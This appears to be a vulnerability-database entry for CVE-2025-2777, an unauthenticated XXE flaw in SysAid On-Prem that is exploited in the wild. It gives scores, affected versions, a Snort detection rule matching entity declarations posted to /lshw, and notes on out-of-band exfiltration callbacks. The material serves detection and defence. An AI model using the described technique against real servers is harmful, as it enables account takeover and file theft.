cbcvebase.
CVE-2025-2777
published 2025-05-07

CVE-2025-2777: SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing…

PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
79.13%
99.6th percentile
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives.

Affected

2 ranges
VendorProductVersion rangeFixed in
sysaidsysaid<= 23.3.40
sysaidsysaid_on-prem<= 23.3.40

Detection & IOCsextracted from sources · hover to see the quote

url/lshw
bytes
|3c 21|ENTITY|20 25|
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS SysAid On-Prem lshw XML External Entity Injection (CVE-2025-2777)"; flow:established,to_server; http.uri; content:"/lshw"; startswith; http.request_body; content:"|3c 21|ENTITY|20 25|"; fast_pattern; content:"SYSTEM"; distance:0; http.method; content:"POST"; reference:url,labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/; reference:cve,2025-2777; classtype:web-application-attack; sid:2066205; rev:1; metadata:affected_product SysAid, attack_target Server, tls_state TLSDecrypt, created_at 2025_12_09, cve CVE_2025_2777, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2025_12_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • XXE payload in the POST body contains a DOCTYPE with a parameter entity declaration using SYSTEM keyword; detect the byte sequence 0x3C 0x21 ('<!') followed by 'ENTITY %' in the request body.
  • Out-of-band XXE exfiltration triggers an outbound HTTP callback from the SysAid server with a Java User-Agent; monitor egress HTTP traffic from SysAid hosts for User-Agent strings containing 'Java'.
  • The interactsh/OOB detection template confirms exploitation via an HTTP interaction on the interactsh protocol channel, indicating DNS/HTTP callback-based XXE exfiltration is the primary exploitation technique.
  • Successful exploitation leads to administrator account takeover and arbitrary file read; investigate SysAid admin account creation or privilege changes following any /lshw POST alert.
  • Snort/Suricata SID 2066205 (ET rule) covers this CVE; ensure TLS inspection (SSLDecrypt) is enabled on perimeter and internal sensors as the rule metadata flags tls_state TLSDecrypt.
  • ·Affected versions are SysAid On-Prem only (<=23.3.40); cloud/SaaS deployments are not in scope and this rule should not be applied to SysAid cloud traffic.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.